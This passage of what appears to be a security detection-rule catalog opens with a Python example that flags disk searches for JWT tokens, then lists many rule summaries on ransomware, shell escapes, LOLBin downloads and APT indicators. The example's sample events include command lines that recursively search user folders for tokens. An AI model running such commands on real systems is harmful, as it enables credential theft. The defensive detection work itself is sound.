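JWT_ANCHORS = (jwt_anchor('{"typ"'), jwt_anchor('{"alg"'))   # ("eyJ0eX", "eyJhbG")

# Tools an operator would use to grep a disk for tokens (assumption for the example).
SEARCH_IMAGES = {"findstr.exe", "grep.exe", "rg.exe"}

def is_jwt_search(event: dict) -> bool:
    """True when a search utility (or PowerShell's Select-String) is given a JWT anchor."""
    image = ntpath.basename(event["Image"]).lower()
    cmd = event["CommandLine"]
    searching = image in SEARCH_IMAGES or "select-string" in cmd.lower()
    # Base64 is case-sensitive, so the anchor comparison is deliberately exact.
    return searching and any(anchor in cmd for anchor in JWT_ANCHORS)

def find_jwt_searches(events):
    """Command lines of the events that look like a search for JWTs."""
    return [e["CommandLine"] for e in events if is_jwt_search(e)]

SAMPLE_EVENTS = [  # constructed process-creation events
    {"Image": r"C:\Windows\System32\findstr.exe",
     "CommandLine": r'findstr /s /i "eyJ0eX" C:\Users\*'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c \"Get-ChildItem -Recurse | Select-String -Pattern 'eyJhbG'\""},
    {"Image": r"C:\Program Files\Git\usr\bin\grep.exe",
     "CommandLine": "grep -r eyJhbG /c/Users"},
    {"Image": r"C:\Windows\System32\findstr.exe",
     "CommandLine": 'findstr /i "error" app.log'},
    # A token passed as an argument contains the anchor too, but nobody is searching:
    {"Image": r"C:\Program Files\MyApp\app.exe",
     "CommandLine": "app.exe --token eyJhbGciOiJIUzI1NiJ9.e30.sig"},
]

if __name__ == "__main__":
    print("anchors:", JWT_ANCHORS)
    for cmd in find_jwt_searches(SAMPLE_EVENTS):
        print("JWT search:", cmd)
```

    The last sample event shows the caveat: a process that merely carries a token on its command line also contains the anchor, so the rule's value lies in pairing the anchor with a search utility rather than matching the string alone.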
  • ETW Logging/Processing Option Disabled On IIS Server

    calendar Oct 6, 2024 · attack.defense-evasion attack.t1562.002 attack.t1505.004  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the IIS server configuration in order to disable or remove the ETW logging/processing option.


    Read More
  • HTTP Logging Disabled On IIS Server

    calendar Oct 6, 2024 · attack.defense-evasion attack.t1562.002 attack.t1505.004  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the IIS server configuration in order to disable HTTP logging for successful requests.


    Read More
  • New Module Module Added To IIS Server

    calendar Oct 6, 2024 · attack.defense-evasion attack.persistence attack.t1562.002 attack.t1505.004  ·
    Share on: twitter facebook linkedin copy

    Detects the addition of a new module to an IIS server.


    Read More
  • Previously Installed IIS Module Was Removed

    calendar Oct 6, 2024 · attack.defense-evasion attack.persistence attack.t1562.002 attack.t1505.004  ·
    Share on: twitter facebook linkedin copy

    Detects the removal of a previously installed IIS module.


    Read More
  • Add Potential Suspicious New Download Source To Winget

    calendar Oct 1, 2024 · attack.defense-evasion attack.execution attack.t1059  ·
    Share on: twitter facebook linkedin copy

    Detects usage of winget to add new potentially suspicious download sources


    Read More
  • Arbitrary File Download Via IMEWDBLD.EXE

    calendar Oct 1, 2024 · attack.defense-evasion attack.execution attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects usage of "IMEWDBLD.exe" to download arbitrary files


    Read More
  • Arbitrary File Download Via MSEDGE_PROXY.EXE

    calendar Oct 1, 2024 · attack.defense-evasion attack.execution attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects usage of "msedge_proxy.exe" to download arbitrary files


    Read More
  • Arbitrary File Download Via Squirrel.EXE

    calendar Oct 1, 2024 · attack.defense-evasion attack.execution attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)


    Read More
  • Chromium Browser Instance Executed With Custom Extension

    calendar Oct 1, 2024 · attack.persistence attack.t1176  ·
    Share on: twitter facebook linkedin copy

    Detects a Chromium based browser process started with the 'load-extension' flag to launch an instance with a custom extension


    Read More
  • Disable Internal Tools or Feature in Registry

    calendar Oct 1, 2024 · attack.defense-evasion attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)


    Read More
  • DNS Query To Devtunnels Domain

    calendar Oct 1, 2024 · attack.command-and-control attack.t1071.001  ·
    Share on: twitter facebook linkedin copy

    Detects DNS query requests to Devtunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.


    Read More
  • DNS Query To Visual Studio Code Tunnels Domain

    calendar Oct 1, 2024 · attack.command-and-control attack.t1071.001  ·
    Share on: twitter facebook linkedin copy

    Detects DNS query requests to Visual Studio Code tunnel domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.


    Read More
  • Eventlog Cleared

    calendar Oct 1, 2024 · attack.defense-evasion attack.t1070.001 car.2016-04-002  ·
    Share on: twitter facebook linkedin copy

    Detects that one of the Windows event logs has been cleared, e.g. via "wevtutil cl" command execution


    Read More
  • Execution of Suspicious File Type Extension

    calendar Oct 1, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process. This rule might require some initial baselining to align with some third party tooling in the user environment.


    Read More
  • F5 BIG-IP iControl Rest API Command Execution - Proxy

    calendar Oct 1, 2024 · attack.initial-access attack.t1190  ·
    Share on: twitter facebook linkedin copy

    Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP


    Read More
  • F5 BIG-IP iControl Rest API Command Execution - Webserver

    calendar Oct 1, 2024 · attack.execution attack.t1190  ·
    Share on: twitter facebook linkedin copy

    Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP


    Read More
  • HackTool - Generic Process Access

    calendar Oct 1, 2024 · attack.credential-access attack.t1003.001 attack.s0002  ·
    Share on: twitter facebook linkedin copy

    Detects process access requests from hacktool processes based on their default image name


    Read More
  • HackTool - WinPwn Execution

    calendar Oct 1, 2024 · attack.credential-access attack.defense-evasion attack.discovery attack.execution attack.privilege-escalation attack.t1046 attack.t1082 attack.t1106 attack.t1518 attack.t1548.002 attack.t1552.001 attack.t1555 attack.t1555.003  ·
    Share on: twitter facebook linkedin copy

    Detects commandline keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.


    Read More
  • HackTool - WinPwn Execution - ScriptBlock

    calendar Oct 1, 2024 · attack.credential-access attack.defense-evasion attack.discovery attack.execution attack.privilege-escalation attack.t1046 attack.t1082 attack.t1106 attack.t1518 attack.t1548.002 attack.t1552.001 attack.t1555 attack.t1555.003  ·
    Share on: twitter facebook linkedin copy

    Detects scriptblock text keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.


    Read More
  • Important Windows Eventlog Cleared

    calendar Oct 1, 2024 · attack.defense-evasion attack.t1070.001 car.2016-04-002  ·
    Share on: twitter facebook linkedin copy

    Detects the clearing of one of the Windows core event logs, e.g. via "wevtutil cl" command execution


    Read More
  • Lace Tempest Cobalt Strike Download

    calendar Oct 1, 2024 · attack.execution detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team


    Read More
  • Lace Tempest File Indicators

    calendar Oct 1, 2024 · attack.execution detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects PowerShell script file creation with specific names or suffixes that were seen being used often in PowerShell scripts by FIN7


    Read More
  • Lace Tempest Malware Loader Execution

    calendar Oct 1, 2024 · attack.execution detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team


    Read More
  • Lace Tempest PowerShell Evidence Eraser

    calendar Oct 1, 2024 · attack.execution attack.t1059.001 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects a PowerShell script used by Lace Tempest APT to erase evidence from victim servers by exploiting CVE-2023-47246 as reported by SysAid Team


    Read More
  • Lace Tempest PowerShell Launcher

    calendar Oct 1, 2024 · attack.execution attack.t1059.001 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects a PowerShell script used by Lace Tempest APT to launch their malware loader by exploiting CVE-2023-47246 as reported by SysAid Team


    Read More
  • Load Of RstrtMgr.DLL By A Suspicious Process

    calendar Oct 1, 2024 · attack.impact attack.defense-evasion attack.t1486 attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects the load of the RstrtMgr DLL (Restart Manager) by a suspicious process. This library has been used during ransomware campaigns to kill processes that would otherwise prevent file encryption by holding locks on files (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shutting down specific processes.


    Read More
  • Load Of RstrtMgr.DLL By An Uncommon Process

    calendar Oct 1, 2024 · attack.impact attack.defense-evasion attack.t1486 attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects the load of the RstrtMgr DLL (Restart Manager) by an uncommon process. This library has been used during ransomware campaigns to kill processes that would otherwise prevent file encryption by holding locks on files (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shutting down specific processes.


    Read More
  • Malicious Driver Load

    calendar Oct 1, 2024 · attack.privilege-escalation attack.t1543.003 attack.t1068  ·
    Share on: twitter facebook linkedin copy

    Detects loading of known malicious drivers via their hash.


    Read More
  • Malicious Driver Load By Name

    calendar Oct 1, 2024 · attack.privilege-escalation attack.t1543.003 attack.t1068  ·
    Share on: twitter facebook linkedin copy

    Detects loading of known malicious drivers via the file name of the drivers.


    Read More
  • Network Connection Initiated To DevTunnels Domain

    calendar Oct 1, 2024 · attack.exfiltration attack.t1567.001  ·
    Share on: twitter facebook linkedin copy

    Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.


    Read More
  • Network Connection Initiated To Visual Studio Code Tunnels Domain

    calendar Oct 1, 2024 · attack.exfiltration attack.t1567.001  ·
    Share on: twitter facebook linkedin copy

    Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.


    Read More
  • New Netsh Helper DLL Registered From A Suspicious Location

    calendar Oct 1, 2024 · attack.persistence attack.t1546.007  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the Netsh registry key that add a new DLL value pointing to a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper


    Read More
  • Permission Misconfiguration Reconnaissance Via Findstr.EXE

    Oct 1, 2024 · attack.credential-access attack.t1552.006

    Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. This was seen being used in combination with "icacls" and other utilities to spot misconfigured file or folder permissions.

  • Portable Gpg.EXE Execution

    Oct 1, 2024 · attack.impact attack.t1486

    Detects the execution of "gpg.exe" from an uncommon location. Often used by ransomware and loaders to decrypt/encrypt data.

  • Potential CVE-2023-46214 Exploitation Attempt

    Oct 1, 2024 · attack.lateral-movement attack.t1210 cve.2023-46214 detection.emerging-threats

    Detects potential exploitation of CVE-2023-46214, a remote code execution (RCE) vulnerability in Splunk Enterprise caused by insecure XML parsing.

  • Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp

    Oct 1, 2024 · attack.t1021.003 attack.lateral-movement

    Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object.

  • Potential File Download Via MS-AppInstaller Protocol Handler

    Oct 1, 2024 · attack.defense-evasion attack.execution attack.t1218

    Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE. The downloaded files are temporarily stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>".

  • Potential Linux Process Code Injection Via DD Utility

    Oct 1, 2024 · attack.defense-evasion attack.t1055.009

    Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command.

  • Potential Persistence Via Netsh Helper DLL - Registry

    Oct 1, 2024 · attack.persistence attack.t1546.007

    Detects changes to the Netsh registry key that add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper.

  • Potential Process Hollowing Activity

    Oct 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055.012

    Detects when a memory process image does not match the disk image, indicative of process hollowing.

  • Potentially Suspicious Electron Application CommandLine

    Oct 1, 2024 · attack.execution

    Detects potentially suspicious command lines of Electron apps (Teams, Discord, Slack, etc.). This could be a sign of abuse to proxy execution through a signed binary.

  • Potentially Suspicious GrantedAccess Flags On LSASS

    Oct 1, 2024 · attack.credential-access attack.t1003.001 attack.s0002

    Detects process access requests to the LSASS process with potentially suspicious access flags.

  • PowerShell Execution With Potential Decryption Capabilities

    Oct 1, 2024 · attack.execution

    Detects PowerShell commands that decrypt an ".LNK" file to drop the next stage of the malware.

  • Process Proxy Execution Via Squirrel.EXE

    Oct 1, 2024 · attack.defense-evasion attack.execution attack.t1218

    Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.).

  • Remote Thread Creation Via PowerShell In Uncommon Target

    Oct 1, 2024 · attack.defense-evasion attack.execution attack.t1218.011 attack.t1059.001

    Detects the creation of a remote thread from a PowerShell process in an uncommon target process.

  • Remote XSL Execution Via Msxsl.EXE

    Oct 1, 2024 · attack.defense-evasion attack.t1220

    Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files.

  • Security Tools Keyword Lookup Via Findstr.EXE

    Oct 1, 2024 · attack.discovery attack.t1518.001

    Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results. This detection focuses on the keywords that the attacker might use as a filter.

  • Suspicious Chromium Browser Instance Executed With Custom Extension

    Oct 1, 2024 · attack.persistence attack.t1176

    Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension.

  • Suspicious Path In Keyboard Layout IME File Registry Value

    Oct 1, 2024 · attack.defense-evasion attack.t1562.001

    Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.

  • Suspicious Shim Database Patching Activity

    Oct 1, 2024 · attack.persistence attack.t1546.011

    Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.

  • Uncommon Extension In Keyboard Layout IME File Registry Value

    Oct 1, 2024 · attack.defense-evasion attack.t1562.001

    Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.

  • Unusual Parent Process For Cmd.EXE

    Oct 1, 2024 · attack.execution attack.t1059

    Detects a suspicious parent process for cmd.exe.

  • Vulnerable Driver Load

    Oct 1, 2024 · attack.privilege-escalation attack.t1543.003 attack.t1068

    Detects loading of known vulnerable drivers via their hash.

  • Vulnerable Driver Load By Name

    Oct 1, 2024 · attack.privilege-escalation attack.t1543.003 attack.t1068

    Detects the load of known vulnerable drivers via the file name of the drivers.

  • Whoami.EXE Execution From Privileged Process

    Oct 1, 2024 · attack.privilege-escalation attack.discovery attack.t1033

    Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors.

  • Whoami.EXE Execution With Output Option

    Oct 1, 2024 · attack.discovery attack.t1033 car.2016-03-001

    Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use.

  • Linux HackTool Execution

    Sep 22, 2024 · attack.execution attack.resource-development attack.t1587

    Detects known hacktool execution based on image name.

  • Linux Network Service Scanning Tools Execution

    Sep 22, 2024 · attack.discovery attack.t1046

    Detects execution of network scanning and reconnaissance tools. These tools can be used, for example, to enumerate local or remote network services.

  • Remote Access Tool - MeshAgent Command Execution via MeshCentral

    Sep 22, 2024 · attack.command-and-control attack.t1219

    Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly. MeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes.

  • Windows Defender Exclusion Registry Key - Write Access Requested

    Sep 22, 2024 · attack.defense-evasion attack.t1562.001

    Detects write access requests to the Windows Defender exclusions registry keys. This could be an indication of an attacker trying to request a handle or access the object to write new exclusions in order to bypass security.

  • Windows Defender Real-time Protection Disabled

    Sep 22, 2024 · attack.defense-evasion attack.t1562.001

    Detects disabling of Windows Defender Real-time Protection. As this event doesn't contain a lot of information on who initiated this action, you might want to reduce it to a "medium" level if this occurs too many times in your environment.

  • Detect MeshAgent Command Execution via MeshCentral

    Sep 21, 2024 · attack.command_and_control attack.t1219

    Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly. MeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes.

  • Search for Antivirus process

    Sep 20, 2024

    Search for Antivirus process

  • Network Connection Initiated To BTunnels Domains

    Sep 13, 2024 · attack.exfiltration attack.t1567.001

    Detects network connections to BTunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

  • PwnKit Local Privilege Escalation

    Sep 13, 2024 · attack.privilege-escalation attack.t1548.001

    Detects potential PwnKit (CVE-2021-4034) exploitation in auth logs.

  • UNC2452 Process Creation Patterns

    Sep 13, 2024 · attack.execution attack.t1059.001 detection.emerging-threats

    Detects specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries.

  • CVE-2021-1675 Print Spooler Exploitation Filename Pattern

    Sep 13, 2024 · attack.execution attack.privilege-escalation attack.resource-development attack.t1587 cve.2021-1675 detection.emerging-threats

    Detects the default filename used in PoC code against the print spooler vulnerability CVE-2021-1675.

  • HackTool - DInjector PowerShell Cradle Execution

    Sep 13, 2024 · attack.defense-evasion attack.t1055

    Detects the use of the DInjector PowerShell cradle based on its specific flags.

  • InstallerFileTakeOver LPE CVE-2021-41379 File Create Event

    Sep 13, 2024 · attack.privilege-escalation attack.t1068 detection.emerging-threats

    Detects signs of the exploitation of LPE CVE-2021-41379, which include an msiexec process that creates an elevation_service.exe file.

  • LPE InstallerFileTakeOver PoC CVE-2021-41379

    Sep 13, 2024 · attack.initial-access attack.t1190 detection.emerging-threats

    Detects the PoC tool used to exploit the LPE vulnerability CVE-2021-41379.

  • Possible CVE-2021-1675 Print Spooler Exploitation

    Sep 13, 2024 · attack.execution attack.t1569 cve.2021-1675 detection.emerging-threats

    Detects driver load errors in print service logs that could be a sign of successful exploitation attempts of the print spooler vulnerability CVE-2021-1675.

  • Potential PrintNightmare Exploitation Attempt

    Sep 13, 2024 · attack.persistence attack.defense-evasion attack.privilege-escalation attack.t1574 cve.2021-1675

    Detects DLL deletions from the Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675.

  • Potential RDP Exploit CVE-2019-0708

    Sep 13, 2024 · attack.lateral-movement attack.t1210 car.2013-07-002

    Detects a suspicious error in the RDP protocol, a potential sign of CVE-2019-0708.

  • Potential SAM Database Dump

    Sep 13, 2024 · attack.credential-access attack.t1003.002

    Detects the creation of files that look like exports of the local SAM (Security Account Manager).

  • Scanner PoC for CVE-2019-0708 RDP RCE Vuln

    Sep 13, 2024 · attack.lateral-movement attack.t1210 car.2013-07-002

    Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE, aka BlueKeep.

  • Suspicious Rejected SMB Guest Logon From IP

    Sep 13, 2024 · attack.credential-access attack.t1110.001

    Detects an attempted PrintNightmare (CVE-2021-1675) remote code execution in the Windows Spooler Service.

  • Windows Spooler Service Suspicious Binary Load

    Sep 13, 2024 · attack.persistence attack.defense-evasion attack.privilege-escalation attack.t1574 cve.2021-1675 cve.2021-34527

    Detects a DLL load from the Spooler Service backup folder.

  • Cicada Ransomware PSExec File Creation

    Sep 9, 2024 · attack.lateral-movement attack.execution attack.t1570 attack.t1569 attack.t1569.002 attack.s0029

    Detects creation of a lightly-renamed PSExec file in C:\Users\Public, as observed in the Cicada3301 Ransomware report from MorphiSec.

  • Cicada3301 Ransomware Execution via PSExec

    Sep 9, 2024 · attack.execution attack.t1569 attack.t1569.002 attack.s0029

    Detects the use of a potentially-renamed psexec to run the Cicada3301 ransomware tool.

  • Hyper-V Virtual Machine Discovery Shutdown via Powershell Cmdlets

    Sep 9, 2024 · attack.defense-evasion attack.impact attack.t1578 attack.t1578.003 attack.t1529

    Detects a PowerShell process used to find and shut down local Hyper-V VMs using the Stop-VM cmdlet, as documented in the 2024 Morphisec report on Cicada3301 ransomware.

  • IISReset Used to Stop IIS Services

    Sep 9, 2024 · attack.impact attack.defense-evasion attack.t1562 attack.t1562.001 attack.t1529

    Detects the use of the iisreset.exe utility to stop IIS web services. This is used to prevent users from accessing IIS web resources, thereby releasing/preventing locks which could inhibit ransomware-related encryption.

  • Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image

    Sep 6, 2024 · attack.defense-evasion attack.t1027

    Detects potential commandline obfuscation using unicode characters. Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.

  • Potential Defense Evasion Via Right-to-Left Override

    Sep 6, 2024 · attack.defense-evasion attack.t1036.002

    Detects the presence of the "U+202E" (Right-to-Left Override) character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. This is used as an obfuscation and masquerading technique.

  • Startup/Logon Script Added to Group Policy Object

    Sep 6, 2024 · attack.privilege-escalation attack.t1484.001 attack.t1547

    Detects the modification of Group Policy Objects (GPO) to add a startup/logon script to users or computer objects.

  • Persistence and Execution at Scale via GPO Scheduled Task

    Sep 6, 2024 · attack.persistence attack.lateral-movement attack.t1053.005

    Detects lateral movement using a GPO scheduled task, usually used to deploy ransomware at scale.

  • Group Policy Abuse for Privilege Addition

    Sep 6, 2024 · attack.privilege-escalation attack.t1484.001

    Detects the first occurrence of a modification to Group Policy Object Attributes to add privileges to user accounts or use them to add users as local admins.

  • Process Deletion of Its Own Executable

    Sep 3, 2024 · attack.defense-evasion

    Detects the deletion of a process's executable by itself. This is usually not possible without workarounds and may be used by malware to hide its traces.

  • Dism Remove Online Package

    Sep 3, 2024 · attack.defense-evasion attack.t1562.001

    Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.

  • PowerShell Web Access Feature Enabled Via DISM

    Sep 3, 2024 · attack.persistence attack.t1548.002

    Detects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse.

  • PowerShell Web Access Installation - PsScript

    Sep 3, 2024 · attack.persistence attack.t1059.001

    Detects the installation and configuration of PowerShell Web Access, which could be used for remote access and potential abuse.

  • Capsh Shell Invocation - Linux

    Sep 2, 2024 · attack.execution attack.t1059

    Detects the use of the "capsh" utility to invoke a shell.

  • Inline Python Execution - Spawn Shell Via OS System Library

    Sep 2, 2024 · attack.execution attack.t1059

    Detects execution of inline Python code via the "-c" flag in order to call the "system" function from the "os" library and spawn a shell.

  • Shell Execution GCC - Linux

    Sep 2, 2024 · attack.discovery attack.t1083

    Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

  • Shell Execution via Find - Linux

    Sep 2, 2024 · attack.discovery attack.t1083

    Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempts.

  • Shell Execution via Flock - Linux

    Sep 2, 2024 · attack.discovery attack.t1083

    Detects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

  • Shell Execution via Git - Linux

    Sep 2, 2024 · attack.execution attack.t1059

    Detects the use of the "git" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

  • Shell Execution via Nice - Linux

    Sep 2, 2024 · attack.discovery attack.t1083

    Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

  • Shell Invocation via Apt - Linux

    Sep 2, 2024 · attack.discovery attack.t1083

    Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

  • Shell Invocation via Env Command - Linux

    Sep 2, 2024 · attack.execution attack.t1059

    Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.

  • Shell Invocation Via Ssh - Linux

    Sep 2, 2024 · attack.execution attack.t1059

    Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

  • Suspicious Invocation of Shell via AWK - Linux

    Sep 2, 2024 · attack.execution attack.t1059

    Detects the execution of "awk" or its sibling commands to invoke a shell using the system() function. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.

  • Vim GTFOBin Abuse - Linux

    Sep 2, 2024 · attack.discovery attack.t1083

    Detects the use of "vim" and its sibling commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

  • AWS S3 Bucket Versioning Disable

    Sep 2, 2024 · attack.impact attack.t1490

    Detects when S3 bucket versioning is disabled. Threat actors use this technique during AWS ransomware incidents prior to deleting S3 objects.

  • Certificate Use With No Strong Mapping

    Sep 2, 2024 · attack.privilege-escalation

    Detects a user certificate that was valid but could not be mapped to a user in a strong way (such as via explicit mapping, key trust mapping, or a SID). This could be a sign of exploitation of the elevation of privilege vulnerabilities (CVE-2022-34691, CVE-2022-26931, CVE-2022-26923) that can occur when the KDC allows certificate spoofing by not requiring a strong mapping. Events where the AccountName and CN of the Subject do not match, or where the CN ends in a dollar sign indicating a machine, may indicate certificate spoofing.

  • ChromeLoader Malware Execution

    Sep 2, 2024 · attack.execution attack.persistence attack.t1053.005 attack.t1059.001 attack.t1176 detection.emerging-threats

    Detects execution of ChromeLoader malware via a registered scheduled task.

  • DarkGate - Autoit3.EXE Execution Parameters

    Sep 2, 2024 · attack.execution attack.t1059 detection.emerging-threats

    Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate command-and-control server.

  • DarkGate - Autoit3.EXE File Creation By Uncommon Process

    Sep 2, 2024 · attack.command-and-control attack.execution attack.t1105 attack.t1059 detection.emerging-threats

    Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe. This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other processes constitute non-standard and suspicious ways to retrieve the Autoit3 executable.

  • DarkGate - User Created Via Net.EXE

    Sep 2, 2024 · attack.persistence attack.t1136.001 detection.emerging-threats

    Detects creation of local users via the net.exe command with the name "DarkGate".

  • Diamond Sleet APT DNS Communication Indicators

    Sep 2, 2024 · attack.command-and-control detection.emerging-threats

    Detects DNS queries related to Diamond Sleet APT activity.

  • Diamond Sleet APT File Creation Indicators

    Sep 2, 2024 · attack.execution detection.emerging-threats

    Detects file creation activity that is related to Diamond Sleet APT activity.

  • Diamond Sleet APT Process Activity Indicators

    Sep 2, 2024 · attack.execution detection.emerging-threats

    Detects process creation activity indicators related to Diamond Sleet APT.

  • Diamond Sleet APT Scheduled Task Creation

    Sep 2, 2024 · attack.execution attack.privilege-escalation attack.persistence attack.t1053.005 detection.emerging-threats

    Detects a registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of the TeamCity CVE-2023-42793 vulnerability.

  • Diamond Sleet APT Scheduled Task Creation - Registry

    Sep 2, 2024 · attack.defense-evasion attack.t1562 detection.emerging-threats

    Detects a registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of the TeamCity CVE-2023-42793 vulnerability.

  • Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback

    Sep 2, 2024 · attack.defense-evasion attack.t1562.001

    Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship.

  • Exploitation Indicators Of CVE-2023-20198

    Sep 2, 2024 · attack.privilege-escalation attack.initial-access detection.emerging-threats

    Detects exploitation indicators of CVE-2023-20198, a privilege escalation vulnerability in the Cisco IOS XE Software Web UI.

  • File Download From IP Based URL Via CertOC.EXE

    Sep 2, 2024 · attack.command-and-control attack.execution attack.t1105

    Detects when a user downloads a file from an IP based URL using CertOC.exe.

  • File Download From IP URL Via Curl.EXE

    Sep 2, 2024 · attack.execution

    Detects file downloads directly from an IP address URL using curl.exe.

  • HackTool - CoercedPotato Named Pipe Creation

    Sep 2, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055

    Detects the pattern of a pipe name as used by the hack tool CoercedPotato.

  • Injected Browser Process Spawning Rundll32 - GuLoader Activity

    Sep 2, 2024 · attack.defense-evasion attack.t1055 detection.emerging-threats

    Detects the execution of installed GuLoader malware on the host. GuLoader initiates network connections via the rundll32.exe process, which is spawned by an injected browser parent process.

  • Kerberoasting Activity - Initial Query

    Sep 2, 2024 · attack.credential-access attack.t1558.003

